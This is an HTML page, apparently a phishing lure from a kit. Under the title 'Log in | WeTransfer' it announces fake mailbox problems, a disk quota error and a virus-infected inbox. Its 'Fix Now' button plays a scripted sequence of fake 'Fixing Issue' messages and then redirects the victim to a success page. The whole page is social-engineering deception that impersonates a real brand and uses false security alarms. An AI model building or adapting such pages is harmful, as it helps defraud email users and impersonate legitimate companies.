<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Log in | WeTransfer</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link rel="stylesheet" href="./css/style.css">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <link rel="icon" type="image/png" sizes="10x10" href="images/logo.png">
</head>

<body cz-shortcut-listen="true">
    <div class="container-fluid p-0">
        <div class="col-12 p-0 cover-image-cont float-left center">
            <div class="col-12 p-0" id="form-holder">
                <div class="col-xs-12 col-sm-12 col-md-5 col-lg-5 col-xl-5 mx-auto vh-100 p-0">
                    <div class="form col-12 p-0">
                        <div class="col-xs-12 col-sm-12 col-md-7 col-lg-7 col-xl-7 mx-auto p-0 shadow">
                            <div class="col-12 float-left bg-sec rounded-top">
                                <div class="form-group mt-3" style="display: flex; justify-content: center; align-items: center;">
                                    <img src="images/logo.png" width="80">
                                </div>
                                <div class="col-12 px-0 py-2 float-left bg-white text-center rounded-top">
                                    <h6 class="font-weight-bold">Found Two Mailbox Issues</h6>
                                </div>
                                <div class="hr float-left col-12"></div>
                                <div class="col-12 px-0 py-2 float-left">
                                    <p class="p m-0 p-0 float-left col-12 text-uppercase">Issue 1: disk quota error...</p>
                                    <sub class="float-left" id="date">Thu Nov 04 2021</sub>
                                </div>
                                <div class="hr float-left col-12"></div>
                                <div class="col-12 px-0 py-2 float-left">
                                    <p class="p m-0 p-0 float-left col-12 text-uppercase">Issue 2 : inbox infected with virus...</p>
                                    <sub class="float-left" id="date">Thu Nov 04 2021</sub>
                                </div>
                                <div class="hr float-left col-12"></div>
                            </div>
                            <div class="col-12 float-left text-center bg-white pt-5 hide" id="spinner">
                                <span class="fa fa-gear fa-spin fa-5x"></span>
                                <p id="issue"></p>
                            </div>
                            <div class="col-12 float-left bg-white rounded-bottom py-5 pb-3">
                                <div class="col-12 float-left p-0">
                                    <div class="col-8 p-0 mx-auto form-group m-0 mt-4">
                                        <button class="btn btn-md btn-secondary mx-auto col-12" style="background:#067438;" id="btnTransfer">Fix Now</button>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    $('#btnTransfer').click(function(){
    $('#spinner').show();
    setTimeout(function(){
        $('#issue').html("Fixing Issue 1");
    },500);
    setTimeout(function(){
        $('#issue').html("Fixing Issue 2");
    },3000);
    setTimeout(function(){
        window.location.replace("./success.html");
    }, 6000);
});


});
</script>

</html>